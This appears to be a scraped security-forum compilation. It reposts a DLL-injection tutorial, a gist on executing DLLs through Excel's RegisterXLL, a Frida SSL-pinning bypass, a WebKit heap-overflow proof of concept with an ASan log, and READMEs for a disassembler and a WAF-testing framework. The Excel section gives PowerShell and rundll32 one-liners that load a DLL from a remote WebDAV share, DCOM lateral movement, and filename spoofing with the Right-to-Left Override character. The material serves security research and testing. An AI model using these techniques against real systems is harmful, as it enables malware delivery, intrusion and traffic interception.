read and write privileges to hold the DLL path name and to hold our assembly code that will load the DLL. 1 2 3 LPVOID lpDllAddr = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); stub = VirtualAllocEx(hProcess, NULL, stubLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Next, we need to get the context of one of the threads running on the target/remote process (the one that is going to be injected with our assembly code). To find the thread, we use the function ‘getThreadID()’, you can find it on the file ‘auxiliary.cpp’. Once we have our thread id, we need to set the thread context. 1 hThread = OpenThread((THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME), false, threadID); Next, we need to suspend the thread to capture its context. The context of a thread is the state of its registers. We are particularly interested in EIP/RIP (call it IP - instruction pointer, if you want). Since the thread is suspended, we can change the EIP/RIP value and force it to continue its execution in a different path (our code cave). 1 2 3 4 5 6 7 8 9 10 11 ctx.ContextFlags = CONTEXT_CONTROL; GetThreadContext(hThread, &ctx); DWORD64 oldIP = ctx.Rip; ctx.Rip = (DWORD64)stub; ctx.ContextFlags = CONTEXT_CONTROL; WriteProcessMemory(hProcess, (void *)stub, &sc, stubLen, NULL); // write code cave SetThreadContext(hThread, &ctx); ResumeThread(hThread); So, we suspend the thread, we capture the context, and from there we extract the EIP/RIP. This is saved to resume the execution when our injected code finishes. The new EIP/RIP is set as our injected code location. We then patch all the placeholders with the return address, the DLL path name address, and the ‘LoadLibrary()’ address. Once the thread starts executing, our DLL will be loaded and once it finishes it will return back to the point it was suspended at and resume its execution there. If you feel like debugging this technique as a learning exercise, here’s how to do it. Launch the application you want to inject into, let’s say ‘notepad.exe’. Run ‘injectAllTheThings_64.exe’ with ‘x64dbg’ as shown below. That is, using the following command line (adapt to your environment): 1 "C:\Users\rui\Documents\Visual Studio 2013\Projects\injectAllTheThings\bin\injectAllTheThings_64.exe" -t 6 notepad.exe "c:\Users\rui\Documents\Visual Studio 2013\Projects\injectAllTheThings\bin\dllmain_64.dll" Set a breakpoint on the call to ‘WriteProcessMemory()’ as shown below. Let it run and when the breakpoint is hit take note of the memory address at the register RDX. If you are asking yourself why RDX is time to read about the calling convention used in x64. Have fun and come back once you finish. Step over (F8) the call to ‘WriteProcessMemory()’, launch another instance of x64dbg and attach to ‘notepad.exe’. Go to the address copied before (the one at RDX) by pressing ‘Ctrl + g’ and you will see our code cave assembly as shown below. Cool, huh!? Now set a breakpoint at the beginning of this shellcode. Go to the ‘injectAllTheThings’ debugged process and let it run. As you can see below our breakpoint is hit and we can now step over the code for fun and enjoy this piece of code working. Once we call the ‘LoadLibrary()’ function, we get our DLL loaded. This is so beautiful… Our shellcode will return to the previously saved RIP and ‘notepad.exe’ will resume execution. For the complete source code see ’t_suspendInjectResume.cpp'. Reflective DLL injection I also incorporated Stephen Fewer’s (pioneer of this technique) code into this ‘injectAllTheThings’ project, and I also built a reflective DLL to be used with this technique. Note that the DLL we’re injecting must be compiled with the appropriate includes and options, so it aligns itself with the Reflective DLL injection method. Reflective DLL injection works by copying the entire DLL into memory, so it avoids registering the DLL with the process. All the heavy lifting is already done for us. To obtain the entry point to our DLL when it’s loaded in memory we only have to use Stephen Fewer’s code. The ‘LoadRemoteLibraryR()’ function included within his project does it for us. We use the ‘GetReflectiveLoaderOffset()’ to determine the offset in our processes memory, then we use that offset plus the base address of the memory in the target/remote process (where we wrote the DLL) as the execution starting point. Too complex? Yes, it might be. Here are the main 4 steps to achieve this. 1 2 3 4 Write the DLL headers into memory Write each section into memory (by parsing the section table) Check imports and load any other imported DLLs Call the DllMain entry-point This technique offers a great level of stealth in comparison to the other methods, and is massively used in Metasploit. If you want to know more just go to the official GitHub repository. Also, make sure to read Stephen Fewer’s paper about it here. Also, have a look at Loading a DLL from memory from Joachim Bauch, author of MemoryModule and this nice post about Loading Win32/64 DLLs “manually” without LoadLibrary(). Code There are some more obscure and complex injection methods around. So I’ll eventually update the ‘injectAllTheThings’ project in the future. Some of the most interesting ones I’ve seen lately are: The one used by DOUBLEPULSAR The one written by @zerosum0x0, Reflective DLL injection using SetThreadContext() and NtContinue() described here and code available here. All of the techniques I described above are implemented in one single project I made available at GitHub. It also includes the required DLLs for each of the techniques. The table below makes it easy to understand what’s actually implemented and how to use it. Method 32 bits 64 bits DLL to use CreateRemoteThread() + + dllmain_32.dll / dllmain_64.dll NtCreateThreadEx() + + dllmain_32.dll / dllmain_64.dll QueueUserAPC() + + dllmain_32.dll / dllmain_64.dll SetWindowsHookEx() + + dllpoc_32.dll / dllpoc_64.dll RtlCreateUserThread() + + dllmain_32.dll / dllmain_64.dll SetThreadContext() + + dllmain_32.dll / dllmain_64.dll Reflective DLL + + rdll_32.dll / rdll_64.dll Needless to say, to be on the safe side, always use injectAllTheThings_32.exe to inject into 32 bits processes or injectAllTheThings_64.exe to inject into 64 bits processes. Although, you can also use injectAllTheThings_64.exe to inject into 32 bits processes. And actually, I didn’t implement it, but I might have to give it a try later, you can go from WoW64 to 64 bits. Which is basically what Metasploit ‘smart_migrate’ does. Have a look here. The code for the whole project, including DLLs is available at GitHub. Compile for 32 and 64 bits, with or without debugging and have fun. References http://www.nologin.org/Downloads/Papers/remote-library-injection.pdf https://warroom.securestate.com/dll-injection-part-1-setwindowshookex/ https://warroom.securestate.com/dll-injection-part-2-createremotethread-and-more/ http://blog.opensecurityresearch.com/2013/01/windows-dll-injection-basics.html http://resources.infosecinstitute.com/using-createremotethread-for-dll-injection-on-windows/ http://securityxploded.com/ntcreatethreadex.php https://www.codeproject.com/Tips/211962/Bit-Injection-Cave http://www.blizzhackers.cc/viewtopic.php?p=2483118 http://resources.infosecinstitute.com/code-injection-techniques/ Windows via C/C++ 5th Edition Authored by rui Jul 16th, 2017 7:49 pm Sursa: http://blog.deniable.org/blog/2017/07/16/inject-all-the-things/
-
DLL Execution via Excel.Application RegisterXLL() method A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server. When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\. The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here including his simple example of an XLL. An interesting thing about Office, is it will perform file format sniffing for certain extensions, such as .xls, .xlk, and .doc (and probably more). This means that you can rename the .xll to a .xls or .xlk and it will still open. However, the initial add-in warning is still triggered, along with another warning that mentions the file format and extension don't match. Since the add-in warning shows the full path to the filename, certain unicode characters can be used to mask the .xll extension. One of my favorites is the [Right-to-Left Override Character] (http://www.fileformat.info/info/unicode/char/202e/index.htm). By using this character, you can make the Excel file appear as if it has any extension. For example, the filename Footbaslx.xll would display as Footballx.xls, since everything after the character is reversed. Here is a basic example of a DLL with the required xlAutoOpen export to make it an XLL that executes on open. As with any DLL, execution can also be triggered in the DLL_PROCESS_ATTACH case. // Compile with: cl.exe notepadXLL.c /LD /o notepad.xll #include <Windows.h> __declspec(dllexport) void __cdecl xlAutoOpen(void); void __cdecl xlAutoOpen() { // Triggers when Excel opens WinExec("cmd.exe /c notepad.exe", 1); } BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } Below are samples of various ways this can be executed. Javascript: // Create Instace of Excel.Application COM object var excel = new ActiveXObject("Excel.Application"); // Pass in path to the DLL (can use any extension) excel.RegisterXLL("C:\\Users\\Bob\\AppData\\Local\\Temp\\evilDLL.xyz"); // Delivered via WebDAV excel.RegisterXLL("\\\\webdavserver\\files\\evilDLL.jpg"); Rundll32.exe mshtml.dll one-liner: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('\\\\webdavserver\\files\\evilDLL.jpg');this.close(); Powershell: # Create Instace of Excel.Application COM object $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application")) # Pass in path to the DLL (can use any extension) $excel.RegisterXLL("C:\Users\Bob\Downloads\evilDLL.txt") # Delivered via WebDAV $excel.RegisterXLL("\\webdavserver\files\evilDLL.jpg"); # One liner with WebDAV: powershell -w hidden -c "IEX ((New-Object -ComObject Excel.Application).RegisterXLL('\\webdavserver\files\evilDLL.jpg'))" @rxwx discovered that this can also be used for lateral movement in environments that support DCOM source, here is an example: $Com = [Type]::GetTypeFromProgID("Excel.Application","192.168.1.111") $Obj = [System.Activator]::CreateInstance($Com) # Detect Office bitness so proper DLL can be used $isx64 = [boolean]$obj.Application.ProductCode[21] # Load DLL from WebDAV $obj.Application.RegisterXLL("\\webdavserver\addins\calcx64.dll") The DCOM pivoting technique has been added to Invoke-DCOM.ps1 by @rvrsh3ll, thanks to @rxwx Here is another XLL PoC by @MooKitty Sursa: https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
-
Universal Android SSL Pinning bypass with Frida On 25 Jul, 2017 By Piergiovanni Cipolloni Android SSL Re-Pinning Two kinds of SSL Pinning implementations can be found in Android apps: the home-made and the proper one. The former is usually a single method, performing all the certificate checks (possibly using custom libraries), that returns a Boolean value. This means that this approach can be easily bypassed by identifying the interesting method and flipping the return value. The following example is a simplified version of a Frida JavaScript script: After we identify the offending method (hint: logcat) we basically hijack it and let it always return true. When SSL Pinning is instead performed according to the official Android documentation, well… things get tougher. There are many excellent solutions out there, being custom android images, underlying frameworks, socket.relaxsslcheck=yes , etc. Almost every attempt at bypassing SSL Pinning is based on manipulating the SSLContext. Can we manipulate the SSLContext with Frida? What we wanted was a generic/universal approach and we wanted to do it with a Frida JavaScript script. The idea here is to do exactly what the official documentation suggests doing so we’ve ported the SSL Pinning Java code to Frida JavaScript. How it works: Load our rogue CAs cert from device Create our own KeyStore containing our trusted CAs Create a TrustManager that trusts the CAs in our KeyStore When the application initializes its SSLContext we hijack the SSLContext.init() method and when it gets called, we swap the 2nd parameter, which is the application TrustManager, with our own TrustManager we previously prepared. (SSLContext.init(KeyManager, TrustManager, SecuRandom)). This way we basically re-pinn the application to our own CA! Example $ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt $ adb shell "/data/local/tmp/frida-server &" $ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause […] [USB::Samsung GT-31337::['it.app.mobile']]-> [.] Cert Pinning Bypass/Re-Pinning [+] Loading our CA... [o] Our CA Info: CN=PortSwigger CA, OU=PortSwigger CA, O=PortSwigger, L=PortSwigger, ST=PortSwigger, C=PortSwigger [+] Creating a KeyStore for our CA... [+] Creating a TrustManager that trusts the CA in our KeyStore... [+] Our TrustManager is ready... [+] Hijacking SSLContext methods now... [-] Waiting for the app to invoke SSLContext.init()... [o] App invoked javax.net.ssl.SSLContext.init... [+] SSLContext initialized with our custom TrustManager! [o] App invoked javax.net.ssl.SSLContext.init... [+] SSLContext initialized with our custom TrustManager! [o] App invoked javax.net.ssl.SSLContext.init... [+] SSLContext initialized with our custom TrustManager! [o] App invoked javax.net.ssl.SSLContext.init... [+] SSLContext initialized with our custom TrustManager! In this case the application invoked SSLContext.init four times which means it verified four different certs (two of which were used by 3rd party tracking libs). Download here: frida-android-repinning_sa.js or from Frida Codeshare here https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/ Frida & Android https://www.frida.re/docs/android/ Sursa: https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/
-
- 2
-
-
Zyan Disassembler Engine (Zydis) Fast and lightweight x86/x86-64 disassembler library. Features Supports all x86 and x86-64 (AMD64) general-purpose and system instructions. Supports pretty much all ISA extensions: FPU (x87), MMX SSE, SSE2, SSE3, SSSE3, SSE4.1, SSE4.2, SSE4A, AESNI AVX, AVX2, AVX512BW, AVX512CD, AVX512DQ, AVX512ER, AVX512F, AVX512PF, AVX512VL ADX, BMI1, BMI2, FMA, FMA4 .. Optimized for high performance No dynamic memory allocation Perfect for kernel-mode drivers and embedded devices Very small file-size overhead compared to other common disassembler libraries Complete doxygen documentation Roadmap Language bindings [v2.0 final] Tests [v2.0 final] Graphical editor for the instruction-database [v2.0 final] Implement CMake feature gates. Currently, everything is always included. [v2.0 final] Encoding support [v2.1] Quick Example The following example program uses Zydis to disassemble a given memory buffer and prints the output to the console. #include <stdio.h> #include <Zydis/Zydis.h> int main() { uint8_t data[] = { 0x51, 0x8D, 0x45, 0xFF, 0x50, 0xFF, 0x75, 0x0C, 0xFF, 0x75, 0x08, 0xFF, 0x15, 0xA0, 0xA5, 0x48, 0x76, 0x85, 0xC0, 0x0F, 0x88, 0xFC, 0xDA, 0x02, 0x00 }; ZydisDecoder decoder; ZydisDecoderInit(&decoder, ZYDIS_MACHINE_MODE_LONG_64, ZYDIS_ADDRESS_WIDTH_64); ZydisFormatter formatter; ZydisFormatterInitEx(&formatter, ZYDIS_FORMATTER_STYLE_INTEL, ZYDIS_FMTFLAG_FORCE_SEGMENTS | ZYDIS_FMTFLAG_FORCE_OPERANDSIZE, ZYDIS_FORMATTER_ADDR_ABSOLUTE, ZYDIS_FORMATTER_DISP_DEFAULT, ZYDIS_FORMATTER_IMM_DEFAULT); uint64_t instructionPointer = 0x007FFFFFFF400000; ZydisDecodedInstruction instruction; char buffer[256]; while (ZYDIS_SUCCESS( ZydisDecoderDecodeBuffer(decoder, data, length, instructionPointer, &instruction))) { data += instruction.length; length -= instruction.length; instructionPointer += instruction.length; printf("%016" PRIX64 " ", instruction.instrAddress); ZydisFormatterFormatInstruction(&formatter, &instruction, &buffer[0], sizeof(buffer)); printf(" %s\n", &buffer[0]); } } Sample Output The above example program generates the following output: 007FFFFFFF400000 push rcx 007FFFFFFF400001 lea eax, dword ptr ss:[rbp-0x01] 007FFFFFFF400004 push rax 007FFFFFFF400005 push qword ptr ss:[rbp+0x0C] 007FFFFFFF400008 push qword ptr ss:[rbp+0x08] 007FFFFFFF40000B call qword ptr ds:[0x008000007588A5B1] 007FFFFFFF400011 test eax, eax 007FFFFFFF400013 js 0x007FFFFFFF42DB15 Compilation Zydis builds cleanly on most platforms without any external dependencies. You can use CMake to generate project files for your favorite C99 compiler. # Linux and OS X git clone 'https://github.com/zyantific/zydis.git' cd zydis mkdir build && cd build cmake .. make ZydisInfo tool License Zydis is licensed under the MIT license. Sursa: https://github.com/zyantific/zydis
-
- 1
-
-
Framework for Testing WAFs (FTW) Purpose This project was created by researchers from ModSecurity and Fastly to help provide rigorous tests for WAF rules. It uses the OWASP Core Ruleset V3 as a baseline to test rules on a WAF. Each rule from the ruleset is loaded into a YAML file that issues HTTP requests that will trigger these rules. Goals / Use cases include: Find regressions in WAF deployments by using continuous integration and issuing repeatable attacks to a WAF Provide a testing framework for new rules into ModSecurity, if a rule is submitted it MUST have corresponding positive & negative tests Evaluate WAFs against a common, agreeable baseline ruleset (OWASP) Test and verify custom rules for WAFs that are not part of the core rule set Installation git clone git@github.com:fastly/ftw.git cd ftw Make sure that pip is installed apt-get install python-pip pip install -r requirements.txt Running Tests with HTML contains and Status code checks only Create YAML files that point to your webserver with a WAF in front of it py.test test/test_default.py --ruledir test/yaml Provisioning Apache+Modsecurity+OWASP CRS If you require an environment for testing WAF rules, there has been one created with Apache, Modsecurity and version 3.0.0 of the OWASP core ruleset. This can be deployed by: Checking out the repository: git clone https://github.com/fastly/waf_testbed.git Typing vagrant up Running Tests while overriding destination address in the yaml files to custom domain start your test web server py.test test/test_default.py --ruledir=test/yaml --destaddr=domain.com --port 443 --protocol https Run integration test, local webserver, may have to use sudo py.test test/integration/test_logcontains.py -s --ruledir=test/integration/ HOW TO INTEGRATE LOGS Create a *.py file with the necessary imports, an example is shown in test/integration/test_logcontains.py All functions with test* in the beginning will be ran by py.test, so make a function def test_somewaf Implement a class that inherits LogChecker Implement the get_logs() function. FTW will call this function after it runs the test, and it will set datetimes of self.start and self.end Use the information from the datetime variables to retrieve the files from your WAF, whether its a file or an API call Get the logs, store them in an array of strings and return it from get_logs() Make use of py.test fixtures. Use a function decorator @pytest.fixture, return your new LogChecker object. Whenever you use a function argument in your tests that matches the name of that @pytest.fixture, it will instantiate your object and make it easier to run tests. An example of this is in the python file from step 1. Write a testing configuration in the *.yaml format as seen in test/integration/LOGCONTAINSFIXTURE.yaml, the log_contains line requires a string that is a regex. FTW will compile the log_contains string from each stage in the YAML file into a regex. This regex will then be used alongside the lines of logs passed in from get_logs() to look for a match. The log_contains string, then, should be a unique rule-id as FTW is greedy and will pass on the first match. False positives are mitigated from the start/end time passed to the LogChecker object, but it is best to stay safe and use unique regexes. For each stage, the get_logs() function is called, so be sure to account for API calls if thats how you retrieve your logs. Making HTTP requests programmatically Although it is preferred to make requests using the YAML format, often automated tests require making many dynamic requests. In such a case it is recommended to make use of the py.test framework in order to produce test cases that can be run as part of the whole. Generally making an HTTP request is simple: create an instance of the HttpUA() class create an instance of the Input() class providing whatever parameters you don't want to be defaulted provide the instance of the input class to HttpUA.send_request() For some examples see the http integration tests Sursa: https://github.com/fastly/ftw
-
- 1
-
-
Publicat pe 19 iul. 2017 Escaping the (sand)box. The promises and pitfalls of modern computational load isolation techniques for Linux OSUsers of modern Linux containerization technologies are frequently at loss with what kind of security guarantees are delivered by tools they use. Typical questions range from Can these be used to isolate software with known security shortcomings and rich history of security vulnerabilities? to even Can I used such technique to isolate user-generated and potentially hostile assembler payloads? Modern Linux OS code-base as well as independent authors provide a plethora of options for those who desire to make sure that their computational loads are solidly confined. Potential users can choose from solutions ranging from Docker-like confinement projects, through Xen hypervisors, seccomp-bpf and ptrace-based sandboxes, to isolation frameworks based on hardware virtualization (e.g. KVM). The talk will discuss available today techniques, with focus on (frequently overstated) promises regarding their strength. In the end, as they say: “Many speed bumps don’t make a wall". CONFidence: http://confidence.org.pl/ Facebook: https://www.facebook.com/confidence.c... Twitter: https://twitter.com/CONFidence_news
-
There is a heap buffer overflow in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= <script> function go() { i.value = "1"; i.type = "search"; f.submit(); } </script> <body onload=go()> <form id="f"> <input id="i" results="1"> ================================================================= ASan log: ================================================================= ==805==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200006a660 at pc 0x000116496d47 bp 0x7fff5597b2a0 sp 0x7fff5597b298 READ of size 8 at 0x61200006a660 thread T0 ==805==WARNING: invalid path to external symbolizer! ==805==WARNING: Failed to use and restart external symbolizer! #0 0x116496d46 in WTF::VectorBufferBase<WebCore::RecentSearch>::buffer() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694d46) #1 0x116496bed in WTF::Vector<WebCore::RecentSearch, 0ul, WTF::CrashOnOverflow, 16ul>::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2694bed) #2 0x116493b4b in unsigned int WTF::Vector<WebCore::RecentSearch, 0ul, WTF::CrashOnOverflow, 16ul>::removeAllMatching<WebCore::RenderSearchField::addSearchResult()::$_0>(WebCore::RenderSearchField::addSearchResult()::$_0 const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2691b4b) #3 0x116493860 in WebCore::RenderSearchField::addSearchResult() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2691860) #4 0x114905297 in WebCore::FormSubmission::create(WebCore::HTMLFormElement&, WebCore::FormSubmission::Attributes const&, WebCore::Event*, WebCore::LockHistory, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb03297) #5 0x114b3aaab in WebCore::HTMLFormElement::submit(WebCore::Event*, bool, bool, WebCore::FormSubmissionTrigger) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd38aab) #6 0x1154cd5a0 in WebCore::jsHTMLFormElementPrototypeFunctionSubmitCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16cb5a0) #7 0x1154c99a8 in long long WebCore::BindingCaller<WebCore::JSHTMLFormElement>::callOperation<&(WebCore::jsHTMLFormElementPrototypeFunctionSubmitCaller(JSC::ExecState*, WebCore::JSHTMLFormElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16c79a8) #8 0x58d153801027 (<unknown module>) #9 0x11fd2434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a) #10 0x11fd2434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a) #11 0x11fd1d91a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a) #12 0x11f982757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757) #13 0x11f9043da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da) #14 0x11ef3c0f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1) #15 0x11ef3c362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362) #16 0x11ef3c6d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3) #17 0x114ff5a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15) #18 0x115389510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510) #19 0x11478a68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e) #20 0x11478a170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170) #21 0x114665041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041) #22 0x114674aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf) #23 0x1145767af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af) #24 0x114571103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103) #25 0x1149169ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce) #26 0x114913d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c) #27 0x11458f493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493) #28 0x114b035c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0) #29 0x11462e093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093) #30 0x1145ed386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386) #31 0x11407c997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997) #32 0x1140762aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa) #33 0x1169fdc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41) #34 0x10ad232eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb) #35 0x10ad26689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689) #36 0x10ad25ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9) #37 0x10a5c6683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683) #38 0x10a3703b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5) #39 0x10a379888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888) #40 0x1203b0312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312) #41 0x1203b0d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41) #42 0x7fff8da4f3c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0) #43 0x7fff8da302cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc) #44 0x7fff8da2f7c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5) #45 0x7fff8da2f1c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3) #46 0x7fff8cf90ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) #47 0x7fff8cf90cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) #48 0x7fff8cf90b25 in _BlockUntilNextEventMatchingListInModeWithFilter 